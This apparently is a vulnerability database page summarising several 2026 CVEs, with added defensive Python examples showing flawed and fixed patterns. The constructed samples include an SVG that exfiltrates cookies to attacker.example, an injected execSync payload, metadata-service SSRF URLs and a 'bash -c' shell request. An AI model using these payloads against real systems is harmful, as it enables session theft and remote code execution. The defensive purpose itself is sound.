Threat Database

Threat Entry Updated 2026-01-16

CVE-2026-22804 - Termix Plugin

Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. In versions 1.7.0 through 1.9.0, a stored cross-site scripting (XSS) vulnerability exists in the Termix File Manager component: the application does not sanitize SVG file content before rendering it. An attacker who has compromised a managed SSH server can plant a malicious SVG file which, when previewed by a Termix user, executes arbitrary JavaScript in the context of the application. The vulnerability is located in src/ui/desktop/apps/file-manager/components/FileViewer.tsx and is fixed in 1.10.0.

PLUGIN Termix

CVE-2026-22804

HIGH CVSS 8.0 2026-01-12
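An illustrative check for the class of file this entry describes, added here as an example; it is not Termix code and does not reflect how FileViewer.tsx is implemented. It walks an SVG document with Python's xml.etree and flags the constructs that make an inline-rendered SVG executable: script elements, on* event handlers, and javascript:/data: URLs. The sample SVG is constructed, and the element and attribute sets are the author's conservative choice, not a standard. The decisive mitigation for a previewer is to render untrusted SVG through an <img> element or a sandboxed frame, where script never runs; a scanner like this is a secondary control.

```python
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"

# Elements that can run script or pull in active/remote content when an SVG is rendered inline.
# <use>, <animate> and <set> are flagged conservatively: they can reference or rewrite hrefs.
FORBIDDEN_TAGS = {"script", "foreignObject", "use", "iframe", "embed", "object", "animate", "set"}
DANGEROUS_SCHEMES = {"javascript", "data", "vbscript"}

# Constructed samples: what a compromised host could plant for the file viewer to preview.
MALICIOUS_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <script>fetch('https://attacker.example/?c=' + document.cookie)</script>
  <a xlink:href="javascript:alert(1)"><text y="20">click</text></a>
  <image href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" onload="alert(2)"/>
  <rect width="10" height="10"/>
</svg>"""
BENIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><circle r="5"/></svg>'


def _local(tag: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on qualified names."""
    return tag.rsplit("}", 1)[-1]


def find_svg_hazards(data: bytes) -> list:
    """Return a list of human-readable hazards; an empty list means nothing active was found."""
    hazards = []
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"unparseable: {exc}"]
    if _local(root.tag) != "svg":
        hazards.append(f"root element is <{_local(root.tag)}>, not <svg>")
    for el in root.iter():
        name = _local(el.tag)
        if name in FORBIDDEN_TAGS:
            hazards.append(f"forbidden element <{name}>")
        for attr, value in el.attrib.items():
            aname = _local(attr)          # xlink:href and href both end up as "href"
            if aname.lower().startswith("on"):
                hazards.append(f"event handler {aname} on <{name}>")
            if aname in {"href", "src"} and ":" in value:
                scheme = value.strip().lower().split(":", 1)[0]
                if scheme in DANGEROUS_SCHEMES:
                    hazards.append(f"{scheme}: URL in {aname} on <{name}>")
    return hazards


def render_decision(data: bytes) -> str:
    """'inline' only for an SVG with no hazards; otherwise 'image', i.e. render via <img>
    (or a sandboxed frame), where the browser never executes script in the document."""
    return "inline" if not find_svg_hazards(data) else "image"
```

The scanner is deliberately allow-nothing on the risky constructs rather than trying to strip them in place: rewriting SVG while keeping it valid is error-prone, and a file that trips any check can simply be shown as a bitmap.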
Threat Entry Updated 2026-01-13

CVE-2026-22805 - Metabase Plugin

Metabase is an open-source data analytics platform. Prior to 55.13, 56.3, and 57.1, self-hosted Metabase instances that allow users to create subscriptions could potentially be affected if the Metabase host is colocated with other unsecured resources. This vulnerability is fixed in 55.13, 56.3, and 57.1.

PLUGIN Metabase

CVE-2026-22805

LOW CVSS 2.1 2026-01-12
Threat Entry Updated 2026-01-21

CVE-2026-22801 - Libpng Plugin

libpng is the reference library for applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. In versions 1.6.26 through 1.6.53, an integer truncation in the simplified write API functions png_write_image_16bit and png_write_image_8bit causes a heap buffer over-read when the caller provides a negative row stride (for bottom-up image layouts) or a stride exceeding 65535 bytes. The bug was introduced in libpng 1.6.26 (October 2016) by casts added to silence compiler warnings on 16-bit systems. This vulnerability is fixed in 1.6.54.

PLUGIN Libpng

CVE-2026-22801

MEDIUM CVSS 6.8 2026-01-12
Threat Entry Updated 2026-01-21

CVE-2026-22214 - RIOT OS Plugin

RIOT OS versions up to and including 2026.01-devel-317 contain a stack-based buffer overflow in the ethos utility due to missing bounds checking when processing incoming serial frame data. The vulnerability is in the _handle_char() function, where incoming frame bytes are appended to a fixed-size stack buffer without verifying that the current write index remains within bounds. An attacker able to send crafted serial or TCP-framed input can push the write index past the buffer size, resulting in a write past the end of the stack buffer. This…

PLUGIN RIOT OS

CVE-2026-22214

MEDIUM CVSS 6.8 2026-01-12
Threat Entry Updated 2026-01-21

CVE-2026-22695 - Libpng Plugin

libpng is the reference library for applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. In versions 1.6.51 through 1.6.53, a heap buffer over-read exists in the simplified API function png_image_finish_read when processing interlaced 16-bit PNGs with an 8-bit output format and a non-minimal row stride. This is a regression introduced by the fix for CVE-2025-65018. This vulnerability is fixed in 1.6.54.

PLUGIN Libpng

CVE-2026-22695

MEDIUM CVSS 6.1 2026-01-12
Threat Entry Updated 2026-01-13

CVE-2026-22212 - TinyOS Plugin

TinyOS versions up to and including 2.1.2 contain a stack-based buffer overflow vulnerability in the mcp2200gpio utility. The vulnerability is caused by unsafe use of strcpy() and strcat() functions when constructing device paths during automatic device discovery. A local attacker can exploit this by creating specially crafted filenames under /dev/usb/, leading to stack memory corruption and application crashes.

PLUGIN TinyOS

CVE-2026-22212

MEDIUM CVSS 4.8 2026-01-12
Threat Entry Updated 2026-01-21

CVE-2026-22800 - PILOS Plugin

PILOS (Platform for Interactive Live-Online Seminars) is a frontend for BigBlueButton. Prior to 4.10.0, a cross-site request forgery (CSRF) vulnerability exists in an administrative API endpoint responsible for terminating all active video conferences on a single server. The affected endpoint performs a destructive action but is exposed via an HTTP GET request. Although proper authorization checks are enforced and the endpoint cannot be triggered cross-site, the use of GET allows the action to be invoked implicitly through same-site content (e.g. embedded resources rendered within the application). As a result, an authenticated…

PLUGIN PILOS

CVE-2026-22800

LOW CVSS 2.4 2026-01-12
Threat Entry Updated 2026-01-21

CVE-2026-22213 - RIOT OS Plugin

RIOT OS versions up to and including 2026.01-devel-317 contain a stack-based buffer overflow vulnerability in the tapslip6 utility. The vulnerability is caused by unsafe string concatenation in the devopen() function, which constructs a device path using unbounded user-controlled input. The utility uses strcpy() and strcat() to concatenate the fixed prefix '/dev/' with a user-supplied device name provided via the -s command-line option without bounds checking. This allows an attacker to supply an excessively long device name and overflow a fixed-size stack buffer, leading to process crashes and memory corruption.

PLUGIN RIOT OS

CVE-2026-22213

LOW CVSS 2.4 2026-01-12
Threat Entry Updated 2026-01-21

CVE-2026-22794 - Appsmith Plugin

Appsmith is a platform to build admin panels, internal tools, and dashboards. Prior to 1.93, the server uses the Origin value from the request headers as the email link baseUrl without validation. If an attacker controls the Origin, password reset / email verification links in emails can be generated pointing to the attacker’s domain, causing authentication tokens to be exposed and potentially leading to account takeover. This vulnerability is fixed in 1.93.

PLUGIN Appsmith

CVE-2026-22794

CRITICAL CVSS 9.6 2026-01-12
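The pattern behind this entry, shown as an added example in Python (it is not Appsmith's code, and the route path and setting names are assumed): the vulnerable builder takes the request's Origin header as the base of the password-reset link, so a forgot-password request with a spoofed Origin makes the victim's email carry a token that points at the attacker's host. The fixed builder derives the base URL from server-side configuration and consults Origin only to choose among operator-approved hosts. The attacker request headers are constructed.

```python
from urllib.parse import urlsplit

# Operator-configured public URL of the deployment and any extra hostnames it legitimately
# answers on (assumed settings for this example, not Appsmith's configuration keys).
CONFIGURED_BASE_URL = "https://appsmith.example.com"
ALLOWED_HOSTS = {"appsmith.example.com", "apps.internal.example.com"}
RESET_PATH = "/user/resetPassword"   # assumed path, not Appsmith's actual route


def reset_link_vulnerable(headers: dict, token: str) -> str:
    """The flawed pattern: whatever Origin the client sent becomes the link's base URL."""
    base = headers.get("Origin", CONFIGURED_BASE_URL).rstrip("/")
    return f"{base}{RESET_PATH}?token={token}"


def reset_link_fixed(headers: dict, token: str) -> str:
    """Derive the base URL from configuration. Origin may only select an approved host,
    never introduce a new one, and must be a bare https origin (no path or query)."""
    base = CONFIGURED_BASE_URL
    origin = headers.get("Origin")
    if origin:
        parts = urlsplit(origin)
        if (parts.scheme == "https" and parts.hostname in ALLOWED_HOSTS
                and not parts.path and not parts.query and parts.username is None):
            base = f"https://{parts.netloc}"
    return f"{base}{RESET_PATH}?token={token}"


def link_goes_to_trusted_host(link: str) -> bool:
    """What a reviewer or an outbound-mail filter would check on the generated link."""
    parts = urlsplit(link)
    return parts.scheme == "https" and parts.hostname in ALLOWED_HOSTS


# Constructed requests: the attacker triggers a reset for the victim with a spoofed Origin;
# the second is a legitimate request arriving on the deployment's alternate hostname.
ATTACKER_HEADERS = {"Host": "appsmith.example.com",
                    "Origin": "https://appsmith-login.attacker.example"}
ALT_HOST_HEADERS = {"Host": "apps.internal.example.com",
                    "Origin": "https://apps.internal.example.com"}
```

The same rule applies to the Host and X-Forwarded-Host headers: anything the client controls is input, and absolute URLs placed in email must come from configuration. The token in these links is a placeholder; real tokens should be generated with a CSPRNG and expire quickly.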
Threat Entry Updated 2026-01-21

CVE-2026-22799 - Emlog Plugin

Emlog is an open source website building system. emlog v2.6.1 and earlier exposes a REST API endpoint (/index.php?rest-api=upload) for media file uploads. The endpoint fails to implement proper validation of file types, extensions, and content, allowing authenticated attackers (with a valid API key or admin session cookie) to upload arbitrary files (including malicious PHP scripts) to the server. An attacker can obtain the API key either by gaining administrator access to enable the REST API setting, or via information disclosure vulnerabilities in the application. Once uploaded, the malicious PHP file…

PLUGIN Emlog

CVE-2026-22799

CRITICAL CVSS 9.3 2026-01-12
Threat Entry Updated 2026-01-21

CVE-2026-22788 - WebErpMesv2 Plugin

WebErpMesv2 is a web-based resource management and manufacturing execution system for industry. Prior to 1.19, the application exposes multiple sensitive API endpoints without authentication middleware. An unauthenticated remote attacker can read business-critical data including companies, quotes, orders, tasks, and whiteboards. Limited write access allows creation of company records and full manipulation of collaboration whiteboards. This vulnerability is fixed in 1.19.

PLUGIN WebErpMesv2

CVE-2026-22788

HIGH CVSS 8.2 2026-01-12
Threat Entry Updated 2026-01-13

CVE-2026-22798 - Hermes Plugin

hermes is an implementation of the HERMES workflow to automate software publication with rich metadata. From 0.8.1 to before 0.9.1, hermes subcommands accept arbitrary options under the -O argument, and these were logged in raw form. If a user provides sensitive data such as an API token (e.g., via hermes deposit -O invenio_rdm.auth_token SECRET), it is written to the log file in plain text and is available to anyone who can read the log file. This vulnerability is fixed in 0.9.1.

PLUGIN Hermes

CVE-2026-22798

MEDIUM CVSS 5.9 2026-01-12
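The failure mode above, reproduced and then closed in an added Python example that is not hermes code and does not reproduce the 0.9.1 fix: a small parser collects the repeated -O key value pairs from a command line, and the logging helper redacts any value whose key looks secret before the line is emitted. The key-name pattern and the log format are assumptions; the invocation mirrors the one quoted in the entry.

```python
import io
import logging
import re

# Keys whose values are secrets. Deliberately broad and case-insensitive: a false positive costs a
# redacted log value, a false negative leaks a credential. The names are assumptions for this example.
SENSITIVE_KEY = re.compile(r"token|secret|password|passwd|api[_-]?key|credential", re.IGNORECASE)


def parse_o_options(argv: list) -> dict:
    """Collect repeated `-O key value` pairs, e.g. ['deposit', '-O', 'invenio_rdm.auth_token', 'SECRET']."""
    opts = {}
    i = 0
    while i < len(argv):
        if argv[i] == "-O":
            if i + 2 >= len(argv):
                raise ValueError("-O requires a key and a value")
            opts[argv[i + 1]] = argv[i + 2]
            i += 3
        else:
            i += 1
    return opts


def redact_options(opts: dict) -> dict:
    """Return a copy safe to log: secret-looking keys keep their name but lose their value."""
    return {k: ("<redacted>" if SENSITIVE_KEY.search(k) else v) for k, v in opts.items()}


def log_options_to_string(opts: dict, redact: bool = True) -> str:
    """Emit the 'running with options' line a subcommand might write, returning the captured text
    so the two behaviours can be compared."""
    buf = io.StringIO()
    logger = logging.getLogger("example.hermes")
    logger.propagate = False
    logger.setLevel(logging.INFO)
    handler = logging.StreamHandler(buf)
    logger.addHandler(handler)
    try:
        logger.info("running with options: %s", redact_options(opts) if redact else opts)
    finally:
        logger.removeHandler(handler)
    return buf.getvalue()
```

Redaction at the log call is the minimum. Secrets passed as command-line arguments are also visible in process listings and shell history, so the stronger change is to read tokens from an environment variable or a file with restrictive permissions rather than from -O at all.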
Threat Entry Updated 2026-01-21

CVE-2026-22789 - WebErpMesv2 Plugin

WebErpMesv2 is a web-based resource management and manufacturing execution system for industry. Prior to 1.19, WebErpMesv2 contains a file upload validation bypass in multiple controllers that allows authenticated users to upload arbitrary files, including PHP scripts, leading to remote code execution (RCE). The vulnerability is identical in nature to CVE-2025-52130 but exists in different code locations that were not addressed by the original fix. This vulnerability is fixed in 1.19.

PLUGIN WebErpMesv2

CVE-2026-22789

MEDIUM CVSS 5.4 2026-01-12
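Both this entry and the Emlog upload entry (CVE-2026-22799) above come down to the same missing control: an upload handler that trusts the client's filename and never looks at the bytes. The validator below is an added Python example, not code from either project and not their fixes; the extension allowlist, magic-byte table and generated-name scheme are the author's choices. It rejects executable extensions anywhere in the name (so shell.php.png fails, not just shell.php), requires the content to start with the signature of the declared type, refuses image files that carry PHP tags, and stores the file under a server-generated name so the client's name never reaches the filesystem.

```python
import os
import secrets

# Accepted extensions and the file signature each must begin with (constructed allowlist).
MAGIC = {
    "png": [b"\x89PNG\r\n\x1a\n"],
    "jpg": [b"\xff\xd8\xff"],
    "jpeg": [b"\xff\xd8\xff"],
    "gif": [b"GIF87a", b"GIF89a"],
    "pdf": [b"%PDF-"],
}
# Extensions a PHP-capable document root must never accept from an upload form, in any position.
EXECUTABLE_EXT = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "phps", "pht",
                  "htaccess", "htm", "html", "svg", "js", "cgi", "pl", "sh"}


def validate_upload(filename: str, content: bytes) -> tuple:
    """Return (accepted, reason, stored_name). stored_name is server-generated."""
    # Normalise: drop any directory part (either separator), whitespace and case.
    base = os.path.basename(filename.replace("\\", "/")).strip().lower()
    parts = base.split(".")
    if len(parts) < 2 or not all(parts):
        return False, "missing or malformed extension", ""
    # Every dotted segment after the first is treated as an extension: this catches shell.php.png
    # and the Apache-style double extension shell.php.jpg.
    exts = parts[1:]
    if any(e in EXECUTABLE_EXT for e in exts):
        return False, f"executable extension in {base}", ""
    ext = exts[-1]
    if ext not in MAGIC:
        return False, f"extension .{ext} not allowed", ""
    if not any(content.startswith(sig) for sig in MAGIC[ext]):
        return False, "content does not match declared type", ""
    # A valid image header followed by PHP is a polyglot that some interpreters will still run.
    body = content.lower()
    if b"<?php" in body or b"<?=" in body or b"<script" in body:
        return False, "embedded script in file body", ""
    return True, "ok", f"{secrets.token_hex(16)}.{ext}"
```

Validation alone is not the whole fix: the upload directory should be served from a location (or a separate host) where the web server has script execution disabled, so a file that slips through is delivered as bytes rather than run.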
Threat Entry Updated 2026-01-13

CVE-2026-22772 - Fulcio Plugin

Fulcio is a certificate authority that issues code signing certificates for OpenID Connect (OIDC) identities. Prior to 1.8.5, Fulcio's metaRegex() function uses an unanchored regular expression, allowing attackers to bypass MetaIssuer URL validation and trigger SSRF against arbitrary internal services. Because the SSRF can only issue GET requests, the request cannot mutate state (assuming the internal services honour GET semantics), and because the response is not returned to the caller, data exfiltration is not possible. A malicious actor could, however, probe an internal network through blind SSRF. This vulnerability is fixed in 1.8.5.

PLUGIN Fulcio

CVE-2026-22772

MEDIUM CVSS 5.8 2026-01-12
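Why an unanchored pattern is a bypass, as an added Python example (not Fulcio's code; the meta-issuer pattern here is hypothetical and Fulcio's real expressions are not reproduced). Python's re.search behaves like Go's regexp.MatchString: it succeeds if the pattern occurs anywhere in the string, so a URL whose host is the cloud metadata service still "matches" as long as an approved issuer URL appears somewhere in its path or query. The anchored version pins the pattern to the whole string and then confirms the host with a real URL parse. The SSRF attempts are constructed.

```python
import re
from urllib.parse import urlsplit

# Hypothetical meta-issuer pattern: any tenant issuer under example-idp.com.
META_ISSUER_PATTERN = r"https://[a-z0-9-]+\.example-idp\.com/"
TRUSTED_SUFFIX = ".example-idp.com"


def issuer_allowed_unanchored(url: str) -> bool:
    """Mirrors the flaw: a match anywhere in the string is accepted."""
    return re.search(META_ISSUER_PATTERN, url) is not None


def issuer_allowed_anchored(url: str) -> bool:
    """Anchor to the whole string (re.fullmatch; in Go, ^...$ or \\A...\\z), allow only a plain
    path after the issuer prefix, then re-check the parsed host rather than trusting the regex."""
    if re.fullmatch(META_ISSUER_PATTERN + r"[A-Za-z0-9._~/-]*", url) is None:
        return False
    parts = urlsplit(url)
    host = parts.hostname or ""
    return (parts.scheme == "https" and host.endswith(TRUSTED_SUFFIX)
            and parts.username is None and not parts.query and not parts.fragment)


def effective_host(url: str) -> str:
    """The host an HTTP client would actually connect to, i.e. what an SSRF reaches."""
    return urlsplit(url).hostname or ""


LEGIT_ISSUER = "https://acme.example-idp.com/"
# Constructed bypass attempts: the approved prefix is present, but only inside the URL.
SSRF_ATTEMPTS = [
    "http://169.254.169.254/latest/meta-data/?next=https://acme.example-idp.com/",
    "https://attacker.example/https://acme.example-idp.com/",
]
```

The second guard (parsing and checking the host) matters on its own: even a correctly anchored regex says nothing about how the HTTP client will interpret userinfo, unusual ports or encoded characters, so the host that will actually be dialled should be validated directly.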
Threat Entry Updated 2026-02-26

CVE-2026-22785 - Orval Plugin

orval generates type-safe JavaScript/TypeScript clients from any valid OpenAPI v3 or Swagger v2 specification. Prior to 7.18.0, the MCP server generation logic builds code by string manipulation that interpolates the summary field from the OpenAPI specification without validation or escaping. An attacker who controls the specification can therefore break out of the string literal and inject arbitrary code into the generated server. This vulnerability is fixed in 7.18.0.

PLUGIN Orval

CVE-2026-22785

CRITICAL CVSS 9.3 2026-01-12
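The break-out in miniature, as an added Python example that is not orval's code and does not reproduce its generator or fix: a tool-table line is emitted first by splicing the summary into a JavaScript string literal, then by serialising it as a JSON literal. JSON string syntax is valid JavaScript, and json.dumps (JSON.stringify in a Node generator) escapes quotes, backslashes and control characters; with the default ensure_ascii=True it also escapes U+2028 and U+2029, which JavaScript source treats as line terminators. The malicious summary is constructed.

```python
import json

# Constructed OpenAPI summary supplied by an attacker-controlled specification.
MALICIOUS_SUMMARY = 'List pets", }); require("child_process").execSync("id"); ({ "x": "'
BENIGN_SUMMARY = "List pets"


def emit_tool_entry_vulnerable(name: str, summary: str) -> str:
    """String splicing: the summary is dropped straight into a JS string literal."""
    return f'  {{ name: "{name}", description: "{summary}" }},'


def emit_tool_entry_fixed(name: str, summary: str) -> str:
    """Every interpolated value becomes a JSON literal, so it cannot close the string."""
    return f"  {{ name: {json.dumps(name)}, description: {json.dumps(summary)} }},"


def unescaped_quote_count(line: str) -> int:
    """Count double quotes not preceded by a backslash. A well-formed entry with two string
    values has exactly four; anything more means the literal was broken out of."""
    count = i = 0
    while i < len(line):
        if line[i] == "\\":
            i += 2          # skip the escaped character
            continue
        if line[i] == '"':
            count += 1
        i += 1
    return count


def generated_entry_is_well_formed(line: str) -> bool:
    return unescaped_quote_count(line) == 4
```

The same discipline applies to every field copied from a specification into generated source (operationId, tags, descriptions, example values): treat the spec as untrusted input, and build identifiers from a strict character allowlist rather than by escaping.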
Threat Entry Updated 2026-01-16

CVE-2026-22784 - Lychee Plugin

Lychee is a free, open-source photo-management tool. Prior to 7.1.0, an authorization vulnerability exists in Lychee's album password unlock functionality that allows users to gain potentially unauthorized access to other users' password-protected albums. When a user unlocks a password-protected public album, the system automatically unlocks all other public albums that share the same password, resulting in a complete authorization bypass for those albums. This vulnerability is fixed in 7.1.0.

PLUGIN Lychee

CVE-2026-22784

LOW CVSS 2.3 2026-01-12
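The authorization scope error in this entry, as an added Python example (not Lychee's code; the session and album model are simplified assumptions): the flawed unlock verifies the password against the requested album and then unlocks every public album the same password happens to open, so two owners who chose the same weak password silently expose each other's albums. The fixed unlock adds exactly the album the user presented a password for. Albums are constructed with per-album salts, which is why the flawed code must re-verify each one rather than compare hashes.

```python
import hashlib
import hmac
import os

PBKDF2_ROUNDS = 50_000   # kept modest so the example runs quickly; production settings are higher


def _hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


def make_album(album_id: str, password: str, public: bool = True) -> dict:
    salt = os.urandom(16)
    return {"id": album_id, "public": public, "salt": salt, "hash": _hash_password(password, salt)}


def password_matches(album: dict, password: str) -> bool:
    return hmac.compare_digest(album["hash"], _hash_password(password, album["salt"]))


def unlock_vulnerable(session: set, albums: dict, album_id: str, password: str) -> bool:
    """Flawed scope: once the password is right for the requested album, every public album
    it also opens is unlocked, although the user never asked for those."""
    if not password_matches(albums[album_id], password):
        return False
    for album in albums.values():
        if album["public"] and password_matches(album, password):
            session.add(album["id"])
    return True


def unlock_fixed(session: set, albums: dict, album_id: str, password: str) -> bool:
    """Unlock exactly the album whose password was presented, nothing else."""
    if not password_matches(albums[album_id], password):
        return False
    session.add(album_id)
    return True


def can_view(session: set, albums: dict, album_id: str) -> bool:
    return album_id in session
```

The general rule: the object a credential unlocks is the object the request named. Deriving the grant from "which objects would this secret open" turns a shared or guessed password into lateral access.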
Threat Entry Updated 2026-01-16

CVE-2026-22781 - TinyWeb Plugin

TinyWeb is an HTTP/HTTPS web server written in Delphi for Win32. Versions before 1.98 are vulnerable to OS command injection via CGI ISINDEX-style query parameters: the query parameters are passed as command-line arguments to the CGI executable via the Windows CreateProcess() API. An unauthenticated remote attacker can execute arbitrary commands on the server by injecting Windows shell metacharacters into HTTP requests. This vulnerability is fixed in 1.98.

PLUGIN TinyWeb

CVE-2026-22781

CRITICAL CVSS 10.0 2026-01-12
Threat Entry Updated 2026-01-16

CVE-2026-22783 - Iris Web Plugin

Iris is a web-based collaborative platform that helps incident responders share technical details during investigations. Prior to 2.4.24, the DFIR-IRIS datastore file management system allows mass assignment of the file_local_name field, which, combined with the delete operation trusting that path, enables authenticated users to delete arbitrary filesystem paths. The attack is a three-step chain: an authenticated user uploads a file to the datastore, updates the file's file_local_name field to point at an arbitrary filesystem path through mass assignment, then triggers the delete operation, which removes the target…

PLUGIN Iris Web

CVE-2026-22783

CRITICAL CVSS 9.6 2026-01-12
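The three-step chain played out against temporary directories, as an added Python example that is not DFIR-IRIS code (the record fields other than file_local_name, and the allowlist, are assumed). Two defects have to line up: the update handler copies every submitted field into the record (mass assignment), and the delete handler joins the stored name onto the datastore root with os.path.join, which discards the root entirely when the second component is an absolute path. The fixed variants take only allowlisted fields from the client and refuse any stored name that is not a bare filename resolving under the datastore root.

```python
import os
import tempfile
import uuid
from pathlib import Path

# Fields a client may change on a datastore file record (assumed names). file_local_name, the only
# field the advisory names, is server-owned and never on this list.
CLIENT_WRITABLE = {"file_original_name", "file_description", "file_tags", "file_is_ioc"}


def upload(root: Path, data: bytes, original_name: str) -> dict:
    """Step 1: store the bytes under a server-generated name; the record keeps only that name."""
    local_name = uuid.uuid4().hex
    (root / local_name).write_bytes(data)
    return {"file_original_name": original_name, "file_local_name": local_name, "file_description": ""}


def update_vulnerable(record: dict, payload: dict) -> None:
    """Step 2 (flawed): mass assignment copies every submitted key, file_local_name included."""
    record.update(payload)


def update_fixed(record: dict, payload: dict) -> None:
    """Step 2 (fixed): only an explicit allowlist of fields is taken from the client."""
    for key, value in payload.items():
        if key in CLIENT_WRITABLE:
            record[key] = value


def delete_vulnerable(root: Path, record: dict) -> None:
    """Step 3 (flawed): os.path.join(root, '/abs/path') returns '/abs/path', so the stored
    value is trusted as-is and whatever it names is removed."""
    os.remove(os.path.join(root, record["file_local_name"]))


def resolve_in_datastore(root: Path, local_name: str) -> Path:
    """Accept only a bare server-generated name and confirm the resolved path stays under root."""
    if local_name in ("", ".", "..") or local_name != Path(local_name).name:
        raise PermissionError(f"refusing datastore name {local_name!r}")
    target = (root / local_name).resolve()
    if root.resolve() not in target.parents:
        raise PermissionError(f"{target} escapes the datastore root")
    return target


def delete_fixed(root: Path, record: dict) -> None:
    resolve_in_datastore(root, record["file_local_name"]).unlink()


def run_attack_chain(fixed: bool) -> dict:
    """Play the chain against fresh temp dirs and report what was actually deleted."""
    root = Path(tempfile.mkdtemp(prefix="datastore-"))
    victim = Path(tempfile.mkdtemp(prefix="outside-")) / "important.txt"
    victim.write_text("do not delete")
    record = upload(root, b"harmless bytes", "evidence.bin")
    uploaded = root / record["file_local_name"]
    payload = {"file_description": "updated", "file_local_name": str(victim)}
    (update_fixed if fixed else update_vulnerable)(record, payload)
    try:
        (delete_fixed if fixed else delete_vulnerable)(root, record)
    except PermissionError:
        pass
    return {"victim_deleted": not victim.exists(), "upload_deleted": not uploaded.exists()}


def path_is_rejected(local_name: str) -> bool:
    """True if resolve_in_datastore refuses the name against a fresh empty datastore."""
    root = Path(tempfile.mkdtemp(prefix="datastore-"))
    try:
        resolve_in_datastore(root, local_name)
    except PermissionError:
        return True
    return False
```

Either fix on its own closes this particular chain, but both belong in the code: the field allowlist stops the client from steering any server-owned column, and the path check protects the delete handler from every other way a bad value could reach file_local_name (an import, a migration, a different endpoint).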
Threat Entry Updated 2026-01-15

CVE-2026-22252 - LibreChat Plugin

LibreChat is a ChatGPT clone with additional features. Prior to v0.8.2-rc2, LibreChat's MCP stdio transport accepts arbitrary commands without validation, allowing any authenticated user to execute shell commands as root inside the container through a single API request. This vulnerability is fixed in v0.8.2-rc2.

PLUGIN LibreChat

CVE-2026-22252

CRITICAL CVSS 9.1 2026-01-12
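One way to stop a chat backend from becoming a remote shell through its MCP stdio transport, as an added Python example that is not LibreChat's code and does not reproduce the v0.8.2-rc2 fix (the server templates, allowed roots and request shape are assumptions): users never supply a command at all. They choose a server template that the operator defined, and may add only positional arguments that are absolute paths under an approved root with no option flags or shell metacharacters. The resulting argv is meant for subprocess.Popen in list form, never through a shell, and ideally under a dedicated unprivileged user rather than root.

```python
from pathlib import PurePosixPath

# Operator-defined MCP stdio servers: launcher by absolute path plus fixed arguments
# (constructed templates; package names are real MCP servers but the paths are assumed).
ALLOWED_SERVERS = {
    "filesystem": ["/usr/local/bin/npx", "-y", "@modelcontextprotocol/server-filesystem"],
    "fetch": ["/usr/local/bin/uvx", "mcp-server-fetch"],
}
# Directories a user may point a server at.
ALLOWED_ROOTS = ("/data/",)
SHELL_META = set(";|&$`<>\n\r\0'\"\\")


def build_stdio_argv(request: dict) -> list:
    """Turn a user-supplied request into an argv, or raise ValueError. Note that there is no
    'command' key to honour: a request like {'command': 'bash', 'args': ['-c', 'id']} is rejected
    simply because it names no known template."""
    server = request.get("server")
    if server not in ALLOWED_SERVERS:
        raise ValueError(f"unknown server template {server!r}")
    extra = request.get("args", [])
    if not isinstance(extra, list) or not all(isinstance(a, str) for a in extra):
        raise ValueError("args must be a list of strings")
    for arg in extra:
        if SHELL_META & set(arg):
            raise ValueError(f"rejected argument {arg!r}")
        if arg.startswith("-"):
            raise ValueError("options are fixed by the server template")
        path = PurePosixPath(arg)
        if not path.is_absolute() or ".." in path.parts or not str(path).startswith(ALLOWED_ROOTS):
            raise ValueError(f"path {arg!r} is outside the allowed roots")
    return [*ALLOWED_SERVERS[server], *extra]


def request_is_rejected(request: dict) -> bool:
    try:
        build_stdio_argv(request)
    except ValueError:
        return False or True
    return False
```

The template approach also fixes the quieter problem the entry implies: even a "validated" free-form command such as npx can be pointed at an arbitrary package, so the allowlist has to cover the full launcher plus fixed arguments, not the executable name alone.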